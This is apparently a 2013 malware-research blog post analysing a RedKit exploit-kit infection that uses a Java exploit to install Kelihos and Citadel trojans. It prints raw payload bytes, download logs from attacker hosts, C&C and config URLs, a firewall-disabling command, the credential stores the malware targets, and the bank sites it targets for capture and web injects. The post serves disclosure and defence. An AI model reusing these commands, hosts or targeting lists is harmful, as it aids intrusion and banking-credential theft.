Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.23
Content-Disposition: inline; filename=dp4.jar
Content-Length: 13239
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/java-archive

PK..
........B[.4.............Cheii6.classuTkS.P.=..$M#.V^ET|`).*.>@.."
H.8e..>.!...........Gf.?......:.....{.9{v7......L...(R2...!....*....I..
　　[...]

Snapshot as proof:

We can see the code inside the JAR looks like this -->>[PASTEBIN]

Our analysis of this JAR proofing the exploit, downloadable link + infection action as per below:
1. Exploit info: CVE-2012-1723 + AES crypto + obfuscated strings of variable values.
2. Point is download ./42.html to be saved as .exe file in local & run by winexec
3. In this case (2nd one) URL is h00p://balimaps.net/42.html (a binary file) + saved file: xywewey.exe

@Cephrurs of our #CrackTeam with help from @rjacksix @EricOpdyke simplify the variables as per below tweet:

@malwaremustdie did a few replaces, a little cleaner: pastebin.com/FdQNHJmn @ericopdyke @rjacksix

— WT4N6 (@Cephurs) April 20, 2013

@malwaremustdiedc406.com/component/cont…#Malwaremustdie @cephurs cracking the Kelihos URL code

— Robin Jackson (@rjacksix) April 21, 2013

The proof of 1st time malware was downloaded via RedKit:

↑At this moment the infection has just been started.

The infection

Snapshots upon infection:

1) Kelihos trojan downloader(agent) straight via obfuscated Java code
2) Kelihos trojan backdoor, "the botnet" & spyware, self-copied of Momma Kelihos
3) The Kelihos' packet "capture" malware component to record traffic
4) In additional, in a glimpse you'll see CMD process for malware operations.

The process is as simple as per above snapshots, upon successful the exploitation Java will save the downloaded binary & run it, usually was %n%n.html (which actually a binary) to be saved as [random].exe (the name depend on the obfuscation logic), then it downloaded and run the Kelihos botnet installer & run client with name of Temp%n%n.exe, and start the capture interface as [random].exe.

If the browser closed, the java parent processes will be stopped (successfully or fail.. in my case Dr. Watson was kicked up), and the Kelihos botnet client trojan will run after self injected in another PID, as per below:

You'll see the malware files as per below picture saved in the %temp% directory:

While the Kelihos trojan/botnet client will be saved in C:\Windows\Temp

The cmd command used to run the trojan is:

The Callbacks

zaheb*
fox.ru

GET 
Host: 
Content-Length
HTTP/1.0
\Temp\temp
.exe
/newbos3.exe
zahebfox.ru

--2013-04-20 15:56:44--  h00p://zahebfox.ru/newbos3.exe
Resolving zahebfox.ru... seconds 0.00, 93.79.37.68
Caching zahebfox.ru => 93.79.37.68
Connecting to zahebfox.ru|93.79.37.68|:80... seconds 0.00, connected.
   :
GET /newbos3.exe HTTP/1.0
Referer: http://110.92.80.47/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Java/1.6.0_23
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: zahebfox.ru
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200
Server: Apache
Content-Length: 816128
Content-Type:
Last-Modified: ╤ß, 20 α∩≡ 2013 06:55:32 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Sat, 20 Apr 2013 06:56:47 GMT
Last-Modified:Sat, 20 Apr 2013 06:48:15 GMT
Accept-Ranges:bytes
  :
200
Length: 816128 (797K) []
Saving to: `newbos3.exe'
Last-modified header invalid -- time-stamp ignored.
2013-04-20 15:57:01 (90.0 KB/s) - `newbos3.exe' saved [816128/816128]

--2013-04-20 23:48:35--  h00p://kezamzoq.ru/newbos3.exe
Resolving kezamzoq.ru... seconds 0.00, 109.87.202.115
Caching kezamzoq.ru => 109.87.202.115
Connecting to kezamzoq.ru|109.87.202.115|:80... seconds 0.00, connected.
  :
GET /newbos3.exe HTTP/1.0
Referer: http://110.92.80.47/news.html
User-Agent: Mozilla/4.0 (Windows XP 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: kezamzoq.ru
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
content-type: application/x-java-archive
accept-encoding: pack200-gzip, gzip
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200
Server: Apache
Content-Length: 815616
Content-Type:
Last-Modified: ╤ß, 20 α∩≡ 2013 11:44:48 GMT
Accept-Ranges: bytes
Server:nginx/1.2.6
Date:Sat, 20 Apr 2013 14:48:33 GMT
Last-Modified:Sat, 20 Apr 2013 14:45:05 GMT
Accept-Ranges:bytes
  :
200
Length: 815616 (797K) []
Saving to: `newbos3.exe'
Last-modified header invalid -- time-stamp ignored.
2013-04-20 23:48:46 (97.1 KB/s) - `newbos3.exe' saved [815616/815616]

Let's take a look into the capture trojan used :-)
A simple reversing will reveal the callback CnC info:

[...]
cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del %s
SeDebugPrivilege
h00p://mcdvs.org/p.htm?sI83nov1l1psffM4puqmMrrhltzgTGkkWomGozutn
h00p://leonormartorell.com/w.htm?suTcpANVzAnUNS7YZkGaziFSUtwLb8v
h00p://aydinca.com/t.htm?uS3Ti98EcucvRj2kAB8atlhBHcfHoINSR8FED2A
h00p://ricoche.com/w.htm?OaLd5fNLxdXywhfIoe7eSPYToMvXKWjxwc6lOgn
h00p://northatlanticmortgage.com/i.htm?cDyHcR32WSns1uwMgV2T8RuSA
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[...]

This "capture" trojan is using NPF tecnnics used libpcap to record traffic, below is my memory capture of the "capture" on going process/as log:

Creating device name: %ws
createDevice for MAC %ws
＜-- NPF_Unload
NPF_Unload: Deleting SymLink at %p
NPF_Unload: Deleting Adapter %ws, Protocol Handle=%p, Device Obj=%p (%p)
--＞ NPF_Unload
＜-- NPF_IoControl
NPF_IoControl: BIOCQUERYOID completed, BytesWritten = %u
NPF_IoControl: Bogus return from NdisRequest (query): Bytes Written (%u) ＞ InfoBufferLength (%u)!!
NPF_IoControl: BIOCSETOID completed, BytesRead = %u
NPF_IoControl: BIOCSETOID|BIOCQUERYOID Request: Oid=%08lx, Length=%08lx
NPF_IoControl: BIOCSETOID - BIOCQUERYOID
NPF_IoControl: Unknown IOCTL code
NPF_IoControl: BIOCSETBUFFERSIZE
NPF_IoControl: BIOCSETDUMPLIMITS
NPF_IoControl: BIOCSETDUMPFILENAME
NPF_IoControl: Error jittering filter
NPF_IoControl: Error - No memory for filter
NPF_IoControl: Error validating program
NPF_IoControl: Error installing the BPF filter. The filter contains TME extensions, not supported on 64bit platforms.
NPF_IoControl: Operative instructions=%u
NPF_IoControl: BIOCSETF
NPF_IoControl: BIOCSENDPACKETSNOSYNC
NPF_IoControl: BIOCGSTATS
NPF_IoControl: BIOCSETEVENTHANDLE
NPF_IoControl: BIOCSMINTOCOPY
NPF_IoControl: BIOCSWRITEREP
NPF_IoControl: Read timeout set to %I64d
NPF_IoControl: BIOCSRTIMEOUT
NPF_IoControl: BIOCISDUMPENDED
NPF_IoControl: BIOCSMODE
NPF_IoControl: BIOCGEVNAME
NPF_IoControl: Function code is %08lx Input size=%08lx Output size %08lx
--＞ NPF_IoControl
＜-- NPF_RequestComplete
--＞ NPF_RequestComplete
NPF: Status Indication
NPF: StatusIndicationComplete
KeGetCurrentIrql() == PASSIVE_LEVEL
pOpen != NULL
e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\openclos.c
pOpen-＞AdapterBindingStatus == ADAPTER_BOUND
pOpen-＞AdapterHandleUsageCounter ＞ 0
NPF_CloseBinding: Not Pending NdisCloseAdapter
NPF_CloseBinding: Pending NdisCloseAdapter
＜-- NPF_Open
NPF_Open: Opened Instances: %u
NPF_Open: Opened the device, Status=%x
NPF_Open: Opening the device %ws, BindingContext=%p
NPF_Open: Failed to allocate packet pool
--＞ NPF_Open
Frequency %I64u MHz
＜-- NPF_CloseOpenInstance
NPF_CloseOpenInstance: Open= %p
--＞ NPF_CloseOpenInstance
＜-- NPF_OpenAdapterComplete
Open != NULL
--＞ NPF_OpenAdapterComplete
＜-- NPF_GetDeviceMTU
pMtu != NULL
pIrp != NULL
--＞ NPF_GetDeviceMTU
＜-- NPF_Close
--＞ NPF_Close
＜-- NPF_Cleanup
NPF_Cleanup: Opened Instances: %u
NPF_Cleanup: Open = %p
--＞ NPF_Cleanup
＜-- NPF_CloseAdapterComplete
NPF_CloseAdapterComplete: Open= %p
--＞ NPF_CloseAdapterComplete
＜-- NPF_PowerChange
--＞ NPF_PowerChange
＜-- NPF_BindAdapter
--＞ NPF_BindAdapter
＜-- NPF_UnbindAdapter
--＞ NPF_UnbindAdapter
＜-- NPF_ResetComplete
--＞ NPF_ResetComplete

For the "Temp%n%n.exe" made callbacks communication to the botnets, you won't imagine the amount of connections. Snapshot is as per two pictures below:

I used special method to grab all of the calls this botnet made, I posted all in here (the TCP ones) -->>[PASTEBIN]
The botnet client sent tons of UDP communications too, I counted more than 50,900+ callbacks made to so many various IP. Anyway I will share the PCAP of my research, can't list all of these IP so soon. Below is the snapshot:

The full-recorded process of this botnet client trojan is here -->>[HERE]

What has been stolen this time?

I'll make it short, reversed the botnet binary and found so many information explained following.

The credentials targeted are mostly FTP accounts, also browser saved passwords and remote access logins:

WinFTP
Favorites.dat
UserName
RemoteDirectory
PortNumber
Software\Martin Prikryl
TPF0
Hostname
your.name@your.server.com
HostDirName
ProfileName
FTPServers.Servers1_FTPServers
Count
_PassWord
_HostName
_UserName
_HostDirName
_Port
wiseftpsrvs.bin
wiseftpsrvs.ini
wiseftp.ini
\AceBIT\
MRU
Software\AceBIT
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
PWD
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
\Whisper Technology\FTP Surfer
sites.db
LookupAccountNameW
host
remote path
Staff-FTP
Invalid smartftp record type
Invalid smartftp record version
CHistoryItem
CStorageFolder
CFavoritesItem
S:"Hostname"
S:"Initial Directory"
S:"Username"
S:"Password"
D:"Transfer Port"
Not a smartftp unicode string
test@test.com
eNI
userid
initial_directory
FTP++.Link\shell\open\command
*.fpl
SiteInfo.QFP
Odin
*Windows/Total Commander
*WinSCP
*Core FTP
*WISE
*Mozilla
*Chrome
*Leech
*Odin
*WinFTP
*Wisper/Surfer
*FTPGetter
*ALFTP
*Deluxe
*Staff
*Blaze
*NetFile
*GoFTP
*3DFTP
*EasyFTP
*XFTP
LeechFTP Bookmark File.
bookmark.dat
AppDir
Software\LeechFTP
LocalDir
LeechFTP
ftp.
NSS_Shutdown
nss3.dll
PK11_FreeSlot
NSS_Init
PK11_Authenticate
PK11_GetInternalKeySlot
NSSBase64_DecodeBuffer
PK11SDR_Decrypt
SECITEM_FreeItem
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_prepare
sqlite3_step
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
mozsqlite3.dll
sqlite3.dll
sqlite3_open
signons.sqlite
signons.txt
signons2.txt
signons3.txt
\profiles.ini
Profile
IsRelative
PathToExe
Mozilla\Firefox
Firefox
Software\Mozilla
SeaMonkey
Mozilla\SeaMonkey
Flock
Flock\Browser
MozSuite
Mozilla\Profiles
Mozilla
K-Meleon
\Profiles
Epic
Epic\Epic
SITE
PASS
NAME
HOST
USER
RPATH
servers.xml
\FTPGetter
servers
server
server_ip
server_user_name
server_user_password
protocol_type
server_port
Goftp Rocks 91802sfaiolpqikeu39
GoFTP
Connections.txt
CREDENTIAL
MS IE FTP Passwords
Ftp
no data
InitialDir
anonymous
HostInfo
Username
DefaultDirectory
me@mysite.com
ftpx
Login
\Plugins\FTP\Hosts
\SavedDialogHistory\FTPHost
DefaultPassword
FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
FileZilla3
Servers
RecentServers
Site
Server
Pass
RemoteDir
DeluxeFTP
FTP-Now
FTPNow
FTP Now
UTF-8
sites
folder
site
name
ADDRESS
LOGIN
PASSWORD
REMOTEPATH
PORT
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
origin_url
password_value
username_value
Chrome
logins
table
SQLite format 3
Web Data
Login Data
Google\Chrome
Chromium
ChromePlus
Bromium
Nichrome
Comodo
RockMelt
CoolNovo
MapleStudio\ChromePlus
Yandex
3D-FTP
sites.ini
\3D-FTP
\SiteDesigner
invalid bitset position
encrypt_pw
url
homedir
port
QData.dat
ESTdb2.dat
\Estsoft\ALFTP
SET DST_ADDR 
SET USER 
SET PASS 
address
username
password
defremotedir
last session
QuickConnection
LastAddress
LastUser
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
Software\FlashPeak\BlazeFtp\Settings
\SmartFTP\Client 2.0\Favorites\
\SmartFTP\Favorites.dat
\SmartFTP\History.dat
\SmartFTP\Client 2.0\Favorites\Favorites.dat
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
Software\TurboFTP
\addrbk.dat
\TurboFTP\addrbk.dat
Software\South River Technologies\WebDrive\Connections
PassWord
Url
KSoftware\Cryer\WebSitePublisher
Name
}\Ipswitch\WS_FTP\Sites
\Ipswitch\WS_FTP Home\Sites
\win.ini
\Ipswitch\WS_FTP
\32BitFtp.ini
HostAddress
HostUsername
RemoteSiteDirLast
B\BitKinex\bitkinex.ds
LastSessionFile
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
SitesDir
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BulletProof Software\BulletProof FTP Client 2010\Options
InstallDir1
Software\BPFTP
\BulletProof Software\BulletProof FTP Client 2009\sites\Bookmarks\
\BulletProof Software\BulletProof FTP Client\2010\sites\Bookmarks\
\BulletProof Software\BulletProof FTP Client 2009\Default.bps
\BulletProof Software\BulletProof FTP Client\2010\Default.bps
y.dat
Software\BPFTP\Bullet Proof FTP
NumEntries
\Main
\Site
SiteName
SiteAddress
Port
Password
Login
Software\NCH Software\ClassicFTP\FTPAccounts
_Password
UserName
Server
KSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
UninstallString
.EXE
DisplayName
CUTEFTP
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
QCHistory
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
sm.dat
smdata.dat
tree.dat
wUTF-16
utf-16
I\GPSoftware\Directory Opus\ConfigFiles\ftp.oxc
\GPSoftware\Directory Opus\Layouts\System\default.oll
host host
host="
pass="
user="
@!

Pcrypt32.dll
Username
FAR Manager FTP
GSoftware\Sota\FFFTP
CredentialSalt
CredentialCheck
Software\Sota\FFFTP\Options
HostAdrs
HostName
KcG
Software\FileZilla
Install_Dir
\FileZilla.xml
\FileZilla\sitemanager.xml
\FileZilla\recentservers.xml
\Recent Servers
\Site Manager
filezilla.xml
sitemanager.xml
recentservers.xml
Server.Host
Host
Server.Port
Server.User
User
Server.Pass
Pass
Remote Dir
\FlashFXP\3\Sites.dat
\FlashFXP\3\Quick.dat
\FlashFXP\3\History.dat
\FlashFXP\4\Sites.dat
\FlashFXP\4\Quick.dat
\FlashFXP\4\History.dat
path
Software\FlashFXP
\Sites.dat
\Quick.dat
\History.dat
Install Path
Software\FlashFXP\3
DataFolder
Software\FlashFXP\4
History.dat
Path
Quick.dat
SOFTWARE\NCH Software\Fling\Accounts
_FtpPassword
FtpUserName
FtpServer
FtpDescription
\Frigate3\FtpSite.XML
aFTP Commander
FTP Commander Pro
FTP Navigator
FTP Commander Deluxe
\ftplist.txt
FTPCON
\Profiles\
.PRF
Software\FTP Explorer\Profiles
\FTP Explorer\profiles.xml
InitialPath
\FTPRush\RushSite.xml
[...]

The Botnet Function

Same reversing made us know these informations planted in the Temp%n%n.exe binary. Mail/SMTP data sender functionality:

SMTP: 
OPEN
MAIL
RCPT
DATA
BUFF
QUIT
HELO 
^From: [^＜＞]*?<(.*?)＞$
MAIL FROM:<
RCPT TO:<
Cannot write
Cannot read
Socket not connected
CONN
CREA
ABORT
SYS
WAIT
%d.%d.%d.%d
＜![CDATA[

HTTP header used for botnet request:

HTTP/1.1
User-Agent: 
Accept: */*
Accept-Encoding: gzip, deflate
Mozilla/5.0 (Windows; U; Windows NT 
; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17
Host

HTTP/Bot Services

text/plain
/index.html
Not found
text/html
HTTP/1.1 
Server: Apache
Content-Length: 
Content-Type: 
Last-Modified: 
Accept-Ranges: bytes
close
Connection: close
gif
image/gif
jpg
image/jpeg
html
text/html; charset=windows-1251
htm
application/x-javascript
css
text/css
＜!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"＞
＜html＞＜head＞
＜title＞404 Not Found＜/title＞
＜/head＞＜body＞
＜h1＞Not Found＜/h1＞
＜p＞The requested URL 
was not found on this server.＜/p＞
＜/body＞＜/html＞
GET 
POST
value="
[not implemented yet for size = 
[not implemented yet]
newbos3
X-Real-My-IP
[MAIN]
Russian
Not Found
＜!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"＞＜html＞
＜head＞＜title＞404 Not Found＜/title＞＜/head＞
＜body＞＜h1＞Not Found＜/h1＞＜/body＞＜/html＞
GET
Content-Length: 
Host: 
HTTP/1.1
chunked
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890/
Not good place: 
Install to: 

Domains, ID & Network Information

Below are the suspicious domain used in this series that I can positively verdict so far, first two's are the source of the installer (Kelihos Momma) & config used domains, and the last one is used to spam expecting REPLY_TO. I won't pointing to Russian, since by the usage of strings, variable names, filenames we suggest the bad actors is reside in East Europe with Slavic to Mid-Asia culture, but AGAIN, the Russian .RU domains was used for the important parts of this infection, please be noted on this matter (To: .RU TLD Authority!).

domain:        ZAHEBFOX.RU
nserver:       ns1.needhed.com.
nserver:       ns2.needhed.com.
nserver:       ns3.needhed.com.
nserver:       ns4.needhed.com.
nserver:       ns5.needhed.com.
nserver:       ns6.needhed.com.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.03.17
paid-till:     2014.03.17
free-date:     2014.04.17
source:        TCI
Last updated on 2013.04.21 10:41:32 MSK

domain:        KEZAMZOQ.RU
nserver:       ns1.needhed.com.
nserver:       ns2.needhed.com.
nserver:       ns3.needhed.com.
nserver:       ns4.needhed.com.
nserver:       ns5.needhed.com.
nserver:       ns6.needhed.com.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.03.17
paid-till:     2014.03.17
free-date:     2014.04.17
source:        TCI
Last updated on 2013.04.21 10:41:32 MSK

domain:        DECO-CLUB.RU
nserver:       dns1.zenon.net.
nserver:       dns2.zenon.net.
state:         REGISTERED, DELEGATED, UNVERIFIED
org:           Ltd. "Buro Pogody"
registrar:     RU-CENTER-REG-RIPN
admin-contact: https://www.nic.ru/whois
created:       2005.04.13
paid-till:     2014.04.13
free-date:     2014.05.14
source:        TCI
Last updated on 2013.04.21 11:26:38 MSK

Ukraine
Bulgaria
Russia
Serbia
Latvia

Additionally our friends during this analysis event, suggested very good data of this infection flux as per below tweets information:

Momma Kelihos infectors (fastflux network) /cc @malwaremustdie @rjacksixtwitter.com/jgouv/status/3…

— João Gouveia (@jgouv) April 20, 2013

Ooops, need to correct my previous Kelihos size estimate. Make that 250K IPs.

— hugbomb (@hugbomb) April 21, 2013

Samples & Research Material

To be shared & exposed "ALL" soon, after fixing my environment back to usual.
In the mean time please just block the necessary malware network (domains and/or IP) data exposed in the above post. PS: So many infected PC is functioned as Bots here, please be careful in executing IP/sinkhole, dismantling effort only to be performed to motherships only, not to aim botnets.

The samples and research materials are as per below list

PCAP: http://www.mediafire.com/?bbcyabxxurf301r
Memory Dumps: http://www.mediafire.com/?y5y1e56xk6kl3es
Samples (as per pic, there are more, DM me) http://www.mediafire.com/?xv87gw5185dnvjp

2013/04/20  13:51  13,239 492.jar      4dc7500eaec309ff784149e71c0c005d
2013/04/20  15:01  47,256 aeraetk.exe  fc476c4b8653f12e041b8ac8b4e0af8b
2013/04/20  18:50  32,256 clicka.exe   f842cbd8e80bdb20d23befda68ebd0c6
2013/04/20  13:51  13,239 dp4.jar      4dc7500eaec309ff784149e71c0c005d
2013/04/20  18:52 815,616 game.exe     de31ba7f73743c461deca7e581b1db42
2013/04/20  15:57 816,128 newbos3.exe  eea68bb70a1f186112286cba9c3e5271
2013/04/20  13:35     800 news.html    3991f5494d24426712a96cf4c79341b8
2013/04/20  18:50  48,280 psaopt.exe   b454175a3bd4fca65a56c65d54a4bca1
2013/04/20  18:50 815,616 temp22.exe   b1d96baaa91fde31f78387454c377cae
2013/04/20  18:50 815,616 temp43.exe   de31ba7f73743c461deca7e581b1db42
2013/04/20  18:50 815,616 temp72.exe   cf90325492e65913ea58d83a7aef2391
2013/04/20  18:50 815,616 temp74.exe   ed575b987a1de74a71f8afe0cd3ee21c
2013/04/20  13:46     202 wesq.html    482cc64c0383ff054b7745b52f6eda25
2013/04/20  15:01  32,768 xywewey.exe  59320fde47334183fc54659dc03a7f38

Malware sites to block 22/4/13 blog.dynamoo.com/2013/04/malwar…

— Conrad Longmore (@ConradLongmore) April 22, 2013

"Video of Explosion at the Boston Marathon 2013" REDKIT infection pastebin.com/raw.php?i=Sx0P…#MalwareMustDie !!

— Alberto Ortega (@a0rtega) April 17, 2013

URL list of infected pages, that participate in current #Redkit attack pastebin.com/raw.php?i=1VB6… cc: @rjacksix

— Denis Laskov (@it4sec) April 20, 2013

#MalwareMustDie - If see video page w/source like PIC.Access differently 3-4 times & see RedKit url changed, infm us. twitter.com/MalwareMustDie…

— Malware Crusaders (@MalwareMustDie) April 21, 2013

@malwaremustdie, source was spam with link to hxxp://182.235.147.164/texas.html, I hope i can explain it better here pastebin.com/guLaHSQW

— Itsuugo (@Itsuugo) April 21, 2013

@malwaremustdie Some more links used in the Boston/Texas themed RedKit EK attack: pastebin.com/gE1sx7wTcc @unixfreaxjp#malware

— Bart (@bartblaze) April 22, 2013

#MalwareMustDie!

What encryption was used?
What is actually written in the config?
What has been downloaded? and sent?
And most of all, where's the CnC?

Friends, thank you very much for asking the above questions, and for your patience in waiting the answer. Once dealing with the Trojan banker the sensitivity of information is higher than other PWS, specially to the real "live" case like this disclosure. But don't worry, we won't leave the analysis unfinished & this case is followed properly.

Let's make it short, after long discussion with authority involved + with anonymous malware crusaders (which I respect very much, with thank's for the great help) finally we have every permission needed to release these "limited" information due to answering the questions and for raising malware awareness purpose.

Please bear with my writings, I a not a writer by default.. Well, OK. here we go..

How was it decoded?

What I can explain in answering this is: Dealing with encryption, the key must be saved in the system overall as a binary form somewhere, which is accessible to the malware in exact-unchanged location, hopefully unnoticed to researchers. So, by the possibility, the only legendary place used to save those kind of data is the registry. And, seeing the binary reversing result showing so many registry and crypto access used to a certain place, making this deduction becoming a solid hint.
Moving forward, in our case that data had been saved in the registry as per Cryptography RNG Seed data of the below rows

1F 01 A1 E2 6D 40 DD A2 F0 E5 7C B3 7C FA 8A 14
93 89 C1 90 F9 F2 CE DB 72 D3 C9 79 C7 2E FA 14
 [...]
 [...]
 [...]
5E FA 48 5A D4 32 F7 25 CC C3 AD 03 ED 07 EC 4F
// I am forbidden to point the exact location (yet)

The reason for these encrypted method is predictable, first, for not making the config & sent information so crack-able unless you understand Citadel (or ZeuS) encryption concept, and, secondly is, to prevent the binary RE & Forensics analysis for decoding the "SHOWN" data.
For instance, what I saw in Citadel's binary is practically not so many info can be used as crime investigation evidence itself, thus as we went to the memory analysis to find that memory was fed up with config encrypted data and transmission data (was handled by same binary) which was hard to separate which goes to where,
Yes, I know you have another "more" tons of questions for this section. We are very sorry, that we cannot write more info in the blog, but please follow to the next sections and you will see how the logic flow, OR just contact us by email.

Config File

Please refer to the previous post, you'll find the config file which was in the mentioned folder with the quick snapshot picture over there, after being downloaded soon on post-infection stage.
Depends on your timing in downloading the configuration file (see the downloaded binary data in traffic captured AFTER infection), there is possibility you get the different config data.
The config data itself WE separated into settings, handles upon captures TAG & JSON format, with additionally injected stealer/phishing forms.

Additionally, please be noted that "Both the JSON and Configuration headers were generated by a research tool which outputs the configuration headers, field descriptions, and JSON code. To avoid confusion (for those familiar with Zeus/Citadel already) this is not a new Citadel version and Citadel itself doesn't use JSON format internally. "

In our case, the config data was decoded to have the below explanatory summary by our analysis, please see well row by row for it may contain important information for you.

The configuration headers

[LAST_VERSION:      versionid] 1.3.5.1

The series of CnC with separated functions

The trojan updated setting:

[LAST_VERSION_URL:  UpdateEXE] h00p://www.keihingroup.co.jp/libraries/joomla/access/file.php|file=4mar.exe

[URL_SERVER_0:        C&C_URL] h00p://keximvlc.com.vn/administrator/modules/mod_menu/tmpl/content.php
[URL_SERVER_0:        C&C_URL] h00p://oklodfmmm.com/pro/file.php

List of the configuration file download urls:

[URL_ADV_SERVERS:BackupConfig] h00p://k-k131.co.jp/administrator/templates/system/html/file.php|file=conf.bin
[URL_ADV_SERVERS:BackupConfig] h00p://www.keihingroup.co.jp/libraries/joomla/access/file.php|file=conf.bin
[URL_ADV_SERVERS:BackupConfig] h00p://mobileindexstats.net/pro/file.php|file=conf.bin

[LOCAL_COMMANDS:data] hostname
[LOCAL_COMMANDS:data] tasklist
[LOCAL_COMMANDS:data] ipconfig /all
[LOCAL_COMMANDS:data] netsh firewall set opmode disable

Capture, Ignore, Keylogging,

This part is very important, the "capture functionality" of this trojan, Citadel defines which URL to be logged/captured or which others to be ignored here, also in addition: which URL to get the screenshot are also defined too.
There are mis-perception between researchers who stated that this part has ACL functionalities, but after decoded this part, is clearly proved the real actual function. In our case, this part of config was decoded as follows:

[HTTP_FILTER:capture] #*wellsfargo.com/*
[HTTP_FILTER:screen_capture] @*payment.com/*
[HTTP_FILTER:ignore] !http://*.com/*.jpg
[HTTP_FILTER:capture] #*adelaidebank.com/*
[HTTP_FILTER:capture] #*anz.com/*
[HTTP_FILTER:capture] #*boq.com.au/*
[HTTP_FILTER:capture] #*banksa.com.au/*
[HTTP_FILTER:capture] #*bankwest.com.au/*
[HTTP_FILTER:capture] #*westpac.com.au/*
[HTTP_FILTER:capture] #*citibank.com.au/*
[HTTP_FILTER:capture] #*colonialfirststate.com.au/*
[HTTP_FILTER:capture] #*commbank.com.au/*
[HTTP_FILTER:capture] #*australia.db.com/*
[HTTP_FILTER:capture] #*ezypay.com.au/*
[HTTP_FILTER:capture] #*nab.com.au/*
[HTTP_FILTER:capture] #*suncorp.com.au/*
[HTTP_FILTER:capture] #*ibanking.stgeorge.com.au/*
[HTTP_FILTER:capture] #*ingdirect.com.au/*
[HTTP_FILTER:capture] #*mebank.com.au/*
[HTTP_FILTER:capture] #*bankers.asn.au/*
[HTTP_FILTER:capture] #*hsbc.com.au/*
[HTTP_FILTER:capture] #*macquarie.com.au/*
[HTTP_FILTER:capture] #*rba.gov.au/*
[HTTP_FILTER:capture] #*www.bankmecu.com.au/*
[HTTP_FILTER:capture] #*etrade.com.au/*
[HTTP_FILTER:capture] #*maitlandmutual.com/*
[HTTP_FILTER:capture] #*aussie.com.au/*
[HTTP_FILTER:capture] #*virginmoney.com.au/*
[HTTP_FILTER:capture] #*paydaymate.com.au/*
[HTTP_FILTER:capture] #*cashdoctors.com.au/*
[HTTP_FILTER:capture] #*cua.com.au/*
[HTTP_FILTER:capture] #*peopleschoicecu.com.au/*
[HTTP_FILTER:capture] #*cufa.com.au/*
[HTTP_FILTER:capture] #*cbh.com.au/*
[HTTP_FILTER:capture] #*hbf.com.au/*
[HTTP_FILTER:capture] #*australianunity.com.au/*
[HTTP_FILTER:capture] #*racv.com.au/*
[HTTP_FILTER:capture] #*namoicotton.com.au/*
[HTTP_FILTER:capture] #*australianunityinvestments.com.au/*
[HTTP_FILTER:capture] #*dfmc.org.au/*
[HTTP_FILTER:capture] bank.exe;java.exe
[HTTP_FILTER:capture] *facebook.com/*

Phishing code injection.

If the URL ssuccessfully captured and then what happen next? The trojan will log and additionally INJECT the malicious codes stated in the JSON format in the configuration files, with noted: if it found previously defined TARGET-ed url ones. Actually this function was seen in ZeuS (and its variant), and Citadel just keep the ZeuS original code for this part.
OK. Please see the below decoded config data:

[HTTP_INJECTS:target] *.ebay.com/*eBayISAPI.dll?*
[HTTP_INJECTS:target] */my.ebay.com/*CurrentPage=MyeBayPersonalInfo*
[HTTP_INJECTS:target] *commbiz.commbank.com.au*
[HTTP_INJECTS:target] h00ps://*.anz.com/IBAU/BANKAWAYTRAN*
[HTTP_INJECTS:target] h00ps://*.westpac.com.au/esis/Login/SrvPage*
[HTTP_INJECTS:target] h00ps://*.westpac.com.au/wtwt/startpage*
[HTTP_INJECTS:target] h00ps://*internetbanking.suncorpbank.com.au*
[HTTP_INJECTS:target] h00ps://banking*.anz.com/*
[HTTP_INJECTS:target] h00ps://ib.nab.com.au/nabib/acctInfo_acctBal.ctl*
